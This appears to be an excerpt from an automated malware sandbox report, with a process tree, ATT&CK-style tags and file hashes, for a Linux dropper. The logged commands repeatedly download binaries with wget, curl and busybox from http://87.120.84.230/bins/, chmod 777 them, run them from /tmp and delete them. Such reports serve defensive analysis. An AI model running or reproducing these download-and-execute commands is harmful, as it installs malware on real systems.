- Executes dropped EXE
PID:1625
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:1626
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1629
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:1632
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1635
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:1638
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1639
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1641
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:1644
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1647
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:1650
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1653
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:1656
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97